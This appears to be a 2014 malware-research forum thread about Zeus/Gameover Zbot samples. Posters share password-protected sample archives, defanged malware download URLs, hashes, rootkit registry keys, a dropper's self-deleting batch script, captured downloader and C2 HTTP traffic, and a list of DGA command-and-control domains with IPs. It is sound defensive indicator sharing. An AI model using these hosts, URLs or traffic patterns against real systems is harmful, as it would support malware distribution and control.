A forum for reverse engineering, OS internals and malware analysis 

Win32/Zeus (alias Zbot)

Forum for analysis and discussion about malware.

Re: Win32/Zeus (alias Zbot)

 #22324  by Artilllerie
 Fri Feb 28, 2014 4:06 pm
Hello,

I have worked on a new zbot sample with rootkit kernel driver yesterday, It's seem to be the gameover version covered by sophos today :
http://nakedsecurity.sophos.com/2014/02 ... e-rootkit/

Pass : infected

included :
Avis.de.Paiement.ex_ (the dropper)
evedgu.ex_ (the zbot sample)
e37aba293ddb236a.sy_ (the rootkit driver)
dumpinjected (dump of an injected part (writeprocessmemory) targetting explorer.exe)
Attachments
(733.68 KiB) Downloaded 88 times

Re: Win32/Zeus (alias Zbot)

 #22347  by sevatar
 Tue Mar 04, 2014 1:48 am
EK dropped loader earlier today. Downloader attempted to grab these, at least one of which appears to be Zbot.

https://www.virustotal.com/file/d25f1e2 ... 393896773/
https://www.virustotal.com/en/file/e048 ... 393896775/

https://malwr.com/analysis/MDRmODY2MGNh ... UxOWM2YTY/
https://malwr.com/analysis/NTI2MzcxMWZj ... Q5MjJiNTI/

h00p://www.del(.)hr/hooted/dogmatics.exe
h00p://twiliteorchestra(.)org/suharto/stropping.exe
Attachments
infected
(896.59 KiB) Downloaded 77 times

Re: Win32/Zeus (alias Zbot)

 #22359  by Xylitol
 Tue Mar 04, 2014 7:57 pm
https://www.virustotal.com/en/file/68ff ... 393962991/ > 1.1.3.4
https://www.virustotal.com/en/file/ee93 ... 393962993/ > 1.1.3.4
https://www.virustotal.com/en/file/f28e ... 393962988/ > 1.1.2.1
I talked about these here: http://www.xylibox.com/2014/03/zeus-1134.html
Attachments
infected
(268.35 KiB) Downloaded 82 times

Re: Win32/Zeus (alias Zbot)

 #22467  by unixfreaxjp
 Tue Mar 18, 2014 9:08 am
Same variant as per posted here: http://www.kernelmode.info/forum/viewto ... 230#p22324

Zeus/P2P Gameover in an attached PE in zip in a spam:
Image
VT: https://www.virustotal.com/en/file/d866 ... /analysis/

The attachement drops these files:
Code: Select all
2014/03/18  08:26   56,832 b5156.sys   a2f2b24bd6fa13095c319f7f61c21d2f
2014/03/18  08:26  611,840 lirea.exe   37cb6bf5bfff4c83558b83b858749299
2014/03/18  08:26      132 ZPE7CDB.bat bd4907c94f562da6084f5c3b9bcfe7c5
b5156.sys is the rootkit hooked to:
Code: Select all
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_B5156\0000\Control
Name: ActiveService	
Type: unicode	
Valu: b5156
VT: https://www.virustotal.com/en/file/f147 ... /analysis/

Usual Auto Gerenerated Batch file:
Code: Select all
@echo off
:d
del "C:\securedoc.exe"
if exist "C:\securedoc.exe" goto d
del /F "%Temp%\ZPE7CDB.bat"
A session of CNC Call back traffic:
Image

Posting this command & receiving response:
Image

Post in Hex:
Image

CNC domain Information:
Code: Select all
aulbbiwslxpvvphxnjij.biz

 ;; QUESTION SECTION:
;aulbbiwslxpvvphxnjij.biz.      IN      A

;; ANSWER SECTION:
aulbbiwslxpvvphxnjij.biz. 1800  IN      A       50.116.4.71

;; AUTHORITY SECTION:
aulbbiwslxpvvphxnjij.biz. 2588  IN      NS      DNS[1-5].REGISTRAR-SERVERS.COM.
IP info:
Code: Select all
$ echo 50.116.4.71|bash origin.sh
Tue Mar 18 17:22:34 JST 2014|
50.116.4.71|li430-71.members.linode.com.|6939 | 50.116.0.0/20 | 
HURRICANE | US | LINODE.COM | LINODE
A session of UDP/p2p Traffic (usual)
Image

Sample set with one session of CNC traffic + UDP is attached.

#MalwareMustDie!
Attachments
pwd: infected
(879.84 KiB) Downloaded 73 times

Re: Win32/Zeus (alias Zbot)

 #22474  by unixfreaxjp
 Wed Mar 19, 2014 1:31 am
Upatre downlods new Zbot/GMO w/rootkit
Spam:
Image
Is Cutwail with this source IP:
Code: Select all
Received: from unknown (HELO 18.98-30-64.static.virginmediabusiness.co.uk) (62.30.98.18)
  by 202.143.83.13 with SMTP; 19 Mar 2014 02:55:40 +0900
Downloading Zbot here:
Image
Header:
Code: Select all
GET /images/TARGT.tp HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: jswcompounding-usa.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 18 Mar 2014 23:59:34 GMT
Content-Length: 483608
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Tue, 18 Mar 2014 11:02:34 GMT
Accept-Ranges: bytes
ZZP..q...Z.....+...V2..........etc etc

The whole package, Malware family picture:
Image
Zbot cnc callbacks, same pattern as per previous case here: http://www.kernelmode.info/forum/viewto ... 230#p22467
Image
The text of header CNC calls of Zbot:
Code: Select all
POST /write HTTP/1.1
Host: default
Accept-Encoding:
Connection: close
Content-Length: 326
X-ID: 5555
.&.......q..Zb.tD.,.F.......v1xr.<
\.=..+.,%.8oe.......'...'...R@.NSNhK'A
.<TC.OVF.I]D.:R7sK#BvNRO.O]F.f.........
.......}Y.....!0.@.0.lS.5.g............
...37g?3h.......!...!...
iL1xh..xhv1xhv1xhv1xhv1xhv1xhv1xhk.....
..........j..Nkv1xk9E.9f?xkm.......
...
...lt.rnv=xmv=.io.......'...'...
nv7xow6xnv1.jw7..v#xov7xov7xov7xov7..v#
Zbot attempt to connect to below malware domains:
Code: Select all
aulbbiwslxpvvphxnjij.biz
aqxoythmntgevmjqsjrugdadhyjn.com
rwinsaewkqkrokrhucofaqwxwkv.ru
tcvkwsbqnjhjobgyttklnfxo.com
xohmozgqxkncqcmljrqsyllkrfy.biz
zxxpvolvljwkeuofkukydiugrwro.org
hgfuzrgylxkllnbkrvorkuox.info
desushrswsiinxwzprvogafml.com
nqocjrqxuknbmbqgkhmtoxpcu.ru
jbdswlfxvctooztvgjfdbquspr.biz
bywcdgijrswmbeulnmjsijcx.info
eqqcdilqbqfxspbecde.org
oozovinytdpbbelsqgsodtsc.net
gmqxkrkeaugifzaurtvhuqcxslr.com
oozovinytdpbbelsqgsodtsc.net
gmqxkrkeaugifzaurtvhuqcxslr.com
ztcpgudtkrwpzjrpcebaoxgp.ru
mptwtibibmrhqtobeizlzzdnfwc.com
xwporinufyfyrgdnvzplrfaofbpf.net

PoC:
Image
It seems like this Zbot want to play DGA, two IP addresses are active now under ENOM domain registration..
Code: Select all
aulbbiwslxpvvphxnjij.biz  50.116.4.71,
xwporinufyfyrgdnvzplrfaofbpf.net 107.158.75.30,
All are in US Network...
Code: Select all
Wed Mar 19 10:54:24 JST 2014|50.116.4.71|li430-71.members.linode.com.|6939 | 50.116.0.0/20 | HURRICANE | US | LINODE.COM | LINODE
Wed Mar 19 10:55:09 JST 2014|107.158.75.30||30693 | 107.158.72.0/22 | SERVERHUB-PHOENIX | US | SERVERHUB.COM | SERVERHUB
Rootkit used: https://www.virustotal.com/en/file/f147 ... 395189543/
Registry hooks:
Code: Select all
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_242B8E047E8C5D29\0000\Control
Name: ActiveService
Type: unicode
data: 242b8e047e8c5d29
Sample is attached w/PCAP.
#MalwareMustDie
Attachments
pwd: infected
(935.54 KiB) Downloaded 84 times

Re: Win32/Zeus (alias Zbot)

 #22482  by Kimberly
 Wed Mar 19, 2014 11:11 am
unixfreaxjp wrote:Upatre downlods new Zbot/GMO w/rootkit
It seems like this Zbot want to play DGA, two IP addresses are active now under ENOM domain registration..
What's new about that, GMO always falls back to DGA ...
  • 1
  • 22
  • 23
  • 24
  • 25
  • 26
  • 29
 Return to “Malware”